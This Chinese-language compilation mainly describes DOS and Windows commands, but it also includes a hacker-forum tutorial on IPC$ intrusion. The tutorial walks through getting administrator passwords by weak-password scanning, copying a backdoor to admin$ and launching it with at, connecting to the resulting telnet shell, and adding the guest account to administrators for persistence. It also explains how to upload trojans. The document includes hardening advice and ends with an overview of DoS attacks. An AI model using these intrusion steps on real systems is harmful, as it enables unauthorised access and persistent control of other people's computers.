DOS中的命令有哪些？

常用的DOS命令有哪些？~

DOS 常用命令命令详解

DOS 常用命令：
dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录
copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘
edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录名
more 分屏显示 type 显示文件内容 rd 删除目录 sys 制作DOS系统盘
ren 改变文件名 xcopy 拷贝目录与文件 chkdsk 检查磁盘 attrib 设置文件属性
fdisk 硬盘分区 date 显示及修改号期 label 设置卷标号 defrag 磁盘碎片整理
msd 系统检测 path 设置搜寻目录 share 文件共享 memmaker内存优化管理
help 帮助 restore 恢复备份文件 set 设置环境变量 time 显示及修改时间
tree 列目录树 debug 随机调试程序 doskey 重新调用DOS命令 prempt 设置提示符 undelete恢复被删的文件 scandisk检测、修理磁盘



常用命令具体介绍:

一、Dir
显示目录文件和子目录列表，呵呵，这个当然是人人要知道的。
可以使用通配符（? 和 *），？表通配一个字符，*表通配任意字符
*.后缀
指定要查看后缀的文件。 上面其实也可以为“ . 后缀”,例如dir *.exe 等于dir .exe
/p
每次显示一个列表屏幕。要查看下一屏，请按键盘上的任意键。
/w
以宽格式显示列表，在每一行上最多显示 5 个文件名或目录名。
/s
列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了
dir *.* -> a.txt 把当前目录文件列表写入a.txt
dir *.* /s -> a.txt 把当前目录文件列表写入a.txt，包括子目录下文件。
二、Attrib
显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用，则 attrib 会显示当前目录中所有文件的属性。
+r
设置只读属性。
-r
清除只读属性。
+a
设置存档文件属性。
-a
清除存档文件属性。
+s
设置系统属性。
-s
清除系统属性。
+h
设置隐藏属性。
-h
清除隐藏属性。
三、Cls
清除显示在命令提示符窗口中的所有信息，并返回空窗口，即“清屏”
四、Exit
退出当前命令解释程序并返回到系统。
五、format
格式化
/q
执行快速格式化。删除以前已格式化卷的文件表和根目录，但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。
六、Ipconfig
显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。
/all
显示所有适配器的完整 TCP/IP 配置信息。
ipconfig 等价于 winipcfg，后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面，但可以使用“网络连接”查看和更新 IP 地址。要做到这一点，请打开 网络连接，右键单击某一网络连接，单击“状态”，然后单击“支持”选项卡。
该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。
七、md
创建目录或子目录
八、Move
将一个或多个文件从一个目录移动到指定的目录。
九、Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 N
etBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。
-a remotename
显示远程计算机的 NetBIOS 名称表，其中，RemoteName 是远程计算机的 NetBIOS 计算机名称。
-A IPAddress
显示远程计算机的 NetBIOS 名称表，其名称由远程计算机的 IP 地址指定（以小数点分隔）。
十、Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息（对于 IP、ICMP、TCP 和 UDP 协议）以及 IPv6 统计信息（对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议）。使用时如果不带参数，netstat 显示活动的 TCP 连接。
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
十一、Ping
通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数，ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。
-t
指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息，请按 CTRL-BREAK。要中断并退出 ping，请按 CTRL-C。
-lSize
指定发送的回响请求消息中“数据”字段的长度（以字节表示）。默认值为 32。size 的最大值是 65,527。
十二、Rename (Ren)
更改文件的名称。
例如 ren *.abc *.cba
十三、Set
显示、设置或删除环境变量。如果没有任何参数，set 命令将显示当前环境设置。
十四、Shutdown
允许您关闭或重新启动本地或远程计算机。如果没有使用参数，shutdown 将注销当前用户。
-m ComputerName
指定要关闭的计算机。
-t xx
将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。
-l
注销当前用户，这是默认设置。-m ComputerName 优先。
-s
关闭本地计算机。
-r
关闭之后重新启动。
-a
中止关闭。除了 -l 和 ComputerName 外，系统将忽略其它参数。在超时期间，您只可以使用 -a。
十五、System File Checker (sfc)
win下才有，在重新启动计算机后扫描和验
证所有受保护的系统文件。
/scannow
立即扫描所有受保护的系统文件。
/scanonce
一次扫描所有受保护的系统文件。
/purgecache
立即清除“Windows 文件保护”文件高速缓存，并扫描所有受保护的系统文件。
/cachesize=x
设置“Windows 文件保护”文件高速缓存的大小，以 MB 为单位。
十六、type
显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件
十七、Tree
图像化显示路径或驱动器中磁盘的目录结构。
十八、Xcopy
复制文件和目录，包括子目录。
/s
复制非空的目录和子目录。如果省略 /s，xcopy 将在一个目录中工作。
/e
复制所有子目录，包括空目录。
十九、copy
将一个或多个文件从一个位置复制到其他位置
二十、del
删除指定文件。
ftp和bat批命令和net和telnet由于子命令太多，这里不说了，不过这几个都是常用到的。
IPC$命令详解:
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!

二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.
解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有
一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上****作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因：
错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows 无法找到网络路径 : 网络有问题；
错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。
错误号1326，未知的用户名或错误密码 ： 原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）
错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。
关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就*大家自己体会和试验了.
六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。

七 如何防范ipc$入侵
1禁止空连接进行枚举(此****作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1）察看本地共享资源
运行-cmd-输入net share
2）删除共享(每次输入一个）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）
3）停止server服务
net stop server /y （重新启动后server服务会重新开启）
4）修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。
如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码，防止通过ipc$穷举密码

八 相关命令
1)建立空连接:
net use $">\\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use $">\\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: $">\\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)
如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: $">\\IP\c$
4)删除一个ipc$连接
net&nbs
p;use $">\\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘，其他盘类推
net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
11. C:\>net use $">\\127.0.0.1\IPC$ "密码" /user:"用户名"
一般用流光，通过扫描弱口令来得到，管理员帐号和密码.
2. C:\>copy srv.exe $">\\127.0.0.1\admin$
先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\>net time \\127.0.0.1
查查时间，发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00，命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧
5. C:\>net time \\127.0.0.1
再查查到时间没有？如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05，那就准备开始下面的命令。

6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32>ntlm
输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！
9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，****作就像在DOS上****作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)
ipc$常见问题:
1，怎样建立空连接，它有什么用？
答：使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接（需要目标开放ipc$）。
对于NT，在默认安全设置下，借助空连接可以列举目标用户、共享，访问everyone权限的共享，访问小部分注册表等，没有什么利用价值。对2000作用就更小了。而且实现也不方便，需借助工具。
2.为什么我连不上IPC$？
答：1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2.确认你的命令没有打错。正确的命令是： net use \目标IPipc$ "密码" /user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3，根据返回的错误号分析原因：
错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows 无法找到网络路径 : 网络有问题；
错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。
错误号1326，未知的用户名或错误密码 ： 原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）
错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。
4，关于ipc$连不上的问题比较复杂，没有总结出一个统一的认识，在肉鸡上实验有时会得出矛盾的结论，十分棘手。 而且知道了问题所在，如果没有用其他办法获得shell，很多问题依然不能解决。
5，怎样打开目标的IPC$？
答：首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马。当然，这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）。还是不行的话（比如有防火墙，杀不了）建议放弃。
6，怎样映射和访问默认共享？
答：使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘，其他盘类推。
如果已经和目标建立了ipc$，则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以，只是不用用户名和密码了：net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时，须用""将路径全引住。
7，如何删除映射和ipc$连接？
答：用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /

del 删除映射的z盘，其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
8，连上ipc$然后我能做什么？
答：能使用管理员权限的帐号成功和目标连接ipc$，表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具（比如pstools系列、Win2000SrvReskit、telnethack等）获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享（没开你就帮他开），你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具（木马）还具有直接控屏的功能。如果是2000server，还可以考虑开启终端服务方便控制。这里提到的工具的使用，请看自带的说明或相关教程。
9，怎样防止别人用ips$和默认共享入侵我？
答：A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1，先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………（有几个删几个）
2，禁止别人空连接
　　 　　 首先运行regedit，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous（DWORD）的键值改为：00000002。
　　 　 3，禁止自动打开默认共享
　　 　　 对于server版，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer（DWORD）的键值改为:00000000。
对于pro版，则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks（DWORD）的键值改为:00000000。
如果上面所说的主键不存在，就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务（不推荐）
net stop lanmanserver
可能会有提示说，XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码，防止通过ipc$穷举密码。但如果你有其他漏洞，ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙，或者端口过滤


不常用DOS命令
diskcomp磁盘比较 append 设置非执行文件路径
expand 还原DOS文件 fasthelp快速显示帮助信息
fc 文件比较 interink启动服务器
setver 设置版本 intersvr启动客户机
subst 路径替换 qbasic Basic集成环境
vsafe 防病毒 unformat恢复已格式化的磁盘
ver 显示DOS版本号 smartdrv设置磁盘加速器
vol 显示磁盘卷标号 lh 将程序装入高端内存
ctty 改变控制设备 emm386 扩展内存管理

下面是dos的基本命令

:DIR 显示指定路径上所有文件或目录的信息,如果你输入E:\DIR回车就会出现E:\下的文件和文件夹,它的后面还可以带参数,如/W,就是DIR/W回车,就能一行显示5个文件名,这是当你的文件太多在显示屏显示不了那么多的时候用就很方便./A 就是显示隐藏文件的,/S 显示当前目录及其子目录下所有的文件,开有很多的,你可以输入/? 这个参数就可以看见很多参数和说明.你还可以几个一起用,如/W/A你可以显示隐藏文件和一行显示5个文件.
2:MD 建立目录,如输入E:\MD 11就在E盘新建了11这个文件夹了.
3:CD 进入某目录,如E:\CD 11就进入了11文件夹了.
4:RD 删除目录,如E:RD 11 就是删除11文件夹,删除空文件夹的时候用的.
5:DEL 删除文件,如E:\DEL 11.TXT 就是删除11.TXT了.
6:DELTREE 删除目录,这个删除不管是不是空目录都删除的.
7:REN 改名 如E:\11.TXT改为22.TXT则E:\REN 11.TXT 22.TXT
8:COPY 拷贝文件,如想拷贝E:\22.TXT到C:\中则C:\COPY E:\22.TXT C:\即可,C:\可以不写,但如果要复制到C:\下的文件夹则要写清楚文件夹或者进入文件夹再复制,如C:\WINDOWS\COPY E:\22.TXT,还可以不在要复制的盘上如F:\COPY E:\11.TXT C:\
9:TYPE 显示文本文件内容 E:\TYPE 11.TXT
10:EDIT 文本编辑 如E:\EDIT 11.TXT就是编辑11.TXT
12:CLS 清屏 屏幕上太乱了，或是屏幕上出现乱码了，清除屏幕上显示内容但不影响电脑内部任何信息
13:TIME 显示或改变当前时间
14:DATE 显示或改变当前日期
15:ATTRIB 文件属性设置命令,C:\ATTRIB -S -H -R 11.TXT就是去掉11.TXT的系统,隐藏,只读的属性.C:\ATTRIB +S +H +R11。TXT 就是加上。
16：SCANDISK（Scandisk.EXE） 磁盘扫描程序
17：FORMAT 格式化 如FORMAT C:\就是格式化C盘,后面也可以带参数,/Q 是快速格式化,/S完成格式化，并将系统引导文件拷贝到该磁盘.
18：FDISK 分区命令
虽然现在很少用DOS了,但这些经常要用的命令还是要学的,因为当系统有问题的时候,不能进入还得用它了

Dos常用命令
一、基础命令
1 dir
无参数：查看当前所在目录的文件和文件夹。
/s：查看当前目录已经其所有子目录的文件和文件夹。
/a：查看包括隐含文件的所有文件。
/ah：只显示出隐含文件。
/w：以紧凑方式（一行显示5个文件）显示文件和文件夹。
/p：以分页方式（显示一页之后会自动暂停）显示。
|more：前面那个符号是“\”上面的那个，叫做重定向符号，就是把一个
命令的结果输出为另外一个命令的参数。more也是一个命令，dir /w |more
得到的结果和dir /w /p的结果是一样的。
其他的参数大家可以用：dir/?查看。

2 cd
cd 目录名：进入特定的目录。如果看到有个目录显示为：abcdef ghi 就
输入：cdabcdef.ghi进入该目录。
cd\ 退回到根目录。
cd..退回到上一级目录。

3 md rd
md 目录名：建立特定的文件夹。 （dos下面习惯叫目录，win下面习惯叫文
件夹。呵呵！）
rd 目录名：删除特定的文件夹。

4 cls
清除屏幕。

5 copy
copy 路径\文件名 路径\文件名 ：把一个文件拷贝到另一个地方。

6 move
move 路径\文件名 路径\文件名 ：把一个文件移动（就是剪切+复制）到另
一个地方。

7 del
del 文件名：删除一个文件。
del *.*：删除当前文件夹下所有文件。
del不能删除文件夹。

8 deltree
删除文件夹和它下面的所有子文件夹还有文件，厉害。。。不要乱用。

9 format
format x: ：x代表盘符，格式化一个分区。在dos下是用fat文件系统格式
化的，在windows2000安装的时候会问你要不要转换为ntfs。

10 type
type 文本文件名：显示出文本文件的内容。

11 edit
其实这是个小程序，编辑文本文件用的。

12 ren
ren 旧文件名 新文件名：改文件名。

二、关于网络的常用命令
1 ping
ping 主机ip或名字：向目标主机发送4个icmp数据包，测试对方主机是否收
到并响应，一般常用于做普通网络是否通畅的测试。但是ping不同不代表网
络不通，有可能是目标主机装有防火墙并且阻止了icmp响应。
ping -t ：不停的发送数据包。当然都很小，不能称作攻击。有些人自己写
了一些类似于ping命令的程序，不停的发送很大的数据包，以阻塞目标主机
的网络连接。

2 net
建议是用net /?获取具体帮助信息。实在是有很多参数，参数下面还有参
数。常用：net view \\主机 来看共享，net start/stop 服务 来启动和停
止服务，信使服务个人不太喜欢。

3 netstat
netstat 主机：查看主机当前的tcp/ip连接状态，如端口的状态。

4 nbtstat
nbtstat 主机：查看主机使用的NetBIOS name。

5 tracert
tracert 主机：查看从你自己到目标逐机到底经过了那些路径。如：
tracert www.ncie.gov.cn 然后等待。。。就会看到你经过的一个个路由节
点，一般大一点的路由器，如电信的主干路由，除了ip以外，都有英文标示
的。

6 pathping
pathping 主机：类似tracert，但可以显示一些tracert不能显示出来的信
息。可以自己试试。

7 ftp
字符方式的ftp，我喜欢用；）不用装cuteftp了。

8 telnet
字符方式的远程登录程序，是网络人员极其爱用的远程登录程序。我最近常
用来调试邮件服务器。

9 ipconfig 非常有用的网络配置、排错。。。命令。
不加参数显示当前机器的网络接口状态。
/all 先是详细的信息。
/release 释放当前ip。
/renew 重新申请ip。
/flushdns 刷新dns缓存。
/registerdns 重新栽dns服务器上注册自己。
。。。。。。

10 arp 操作当前的arp缓存。
-a 显示arp缓存。
-d 删除一条缓存纪录。
-s 田家一条缓存纪录。

11 nslookup 排除dns错误的利器。是一个交互的工具。使用之前请先努力弄清楚dns的作用以及dns的工作原理。

xcopy是一个外部命令，也就是说，是一个小程序，有的时候会发现软盘上没有，硬盘上也没有。。。昏倒。。。当然勇气来使比copy好用，我喜欢加/e参数。
smartdrv.exe 加载磁盘缓存，参数是缓存的大小，单位是kb。
如：smartdrv 32768 就是加载32M的缓存。
缓存的作用在你安装WIN2K的时候非常明显！不加缓存装WIN2K PRO要3小时左右，加载8M缓存后，只要30分钟。
原理是在内存中划分出一块区域，在安装期间不断地把硬盘上的数据读取到那块缓存区域中，充分利用了内存。

AT和任务计划作用一样。
以下是使用方法，可以通过在命令提示符下面输入：AT /?获得帮助。

AT 命令安排在特定日期和时间运行命令和程序。
要使用 AT 命令，计划服务必须已在运行中。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE]
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"

\\computername 指定远程计算机。 如果省略这个参数，会计划在本地计算机上运行命令。
\\127.0.0.1代表本机。和不加这个参数意思一样。

id 指定给已计划命令的识别号。
用来识别任务，比如你要添加好几个任务，ID=1就代表第一个喽！

/delete 删除某个已计划的命令。如果省略 id，
计算机上所有已计划的命令都会被删除。
/yes 不需要进一步确认时，跟删除所有作业
的命令一起使用。
time 指定运行命令的时间。
/interactive 允许作业在运行时，与当时登录的用户
桌面进行交互。
/every:date[,...] 每个月或每个星期在指定的日期运行命令。
如果省略日期，则默认为在每月的本日运行。
/next:date[,...] 指定在下一个指定日期(如，下周四)运行命令。
如果省略日期，则默认为在每月的本日运行。
"command" 准备运行的 Windows NT 命令或批处理程序。

dos
文章约定：

本文章分概念和如何两部分。

在概念中将告诉您关于该词条的定义、背景及原理。

在如何中将告诉您关于该词条的应用、技巧及可能遇上的问题。

通常所说的DOS有两种不同的概念，即拒绝服务或一种磁盘操作系统。

概念

1 DoS纵览

DoS即拒绝服务，是指攻击者直接或间接的发送大量数据包给目标主机的服务端口造成其网络阻塞，无法为客户提供正常服务的攻击手段。警告：为了您的安全和网络的未来，请不要以任何名义用DoS攻击互联网的主机。

按实现手段可分为DoS、Ddos、DRDos等。

1.1什么是DoS?

DoS是英文“Denial of service”的缩写，中文意思是“拒绝服务”。DoS攻击专门设计用来阻止授权用户对系统以及系统数据进行访问，通常采用的攻击方式是让系统服务器超载或者让系统死机。类似于几百个人同时拨一个电话，导致电话繁忙和不可用。DoS攻击可能涉及到通过国际互联网发送大量的错误网络信息包。如果DoS攻击来源于单点进攻，那么可以采用简单的交通控制系统来探测到电脑黑客。较为复杂的DoS攻击可以包含多种结构和大量的攻击点。电脑黑客经常操纵其它计算机和网络服务器并且使用它们的地址进行DoS攻击，这样就可以掩盖他们自己的真实身份。

1.2什么是DdoS?

与之紧密相关的另一个概念就是DdoS ,DdoS是英文“distribution Denial of service”的缩写，中文意思是“分布式拒绝服务攻击”，这种攻击方法使用与普通的拒绝服务攻击同样的方法，但是发起攻击的源是多个。通常，攻击者使用下载的工具渗透无保护的主机，当获得该主机的适当的访问权限后，攻击者在主机中安装软件的服务或进程（以下简称代理）。这些代理保持睡眠状态，直到从它们的主控端得到指令。主控端命令代理对指定的目标发起拒绝服务攻击。随着 cable modems, DSL和危害力及强的黑客工具的广泛传播使用，有越来越多的可以被访问的主机。分布式拒绝服务攻击是指主控端可以同时对一个目标发起几千个攻击。单个的拒绝服务攻击的威力也许对带宽较宽的站点没有影响，而分布于全球的几千个攻击将会产生致命的效果。

1.3什么是DRDoS?

DRDoS是英文“Distributed Reflection Denial of Servie Attack”的缩写，中文意思是“分布是反射拒绝服务攻击”。同上述两个不同，该方式靠的是发送带有被害者IP地址的数据包给攻击主机（有点像送错信）。由于是利用TCP/IP服务的“三握手”的第二步，因此攻击者无需给被攻击者安装木马，发动DRDoS也只要花费攻击者很少的资源。想要了解DRDoS的细节可以参考以下资料：

A、《黑客防线精华本（2002(下册)）》……新一代的DDoS攻击。这篇文章作者以受害者的身份介绍了DRDoS的发现、分析、解决及反思。

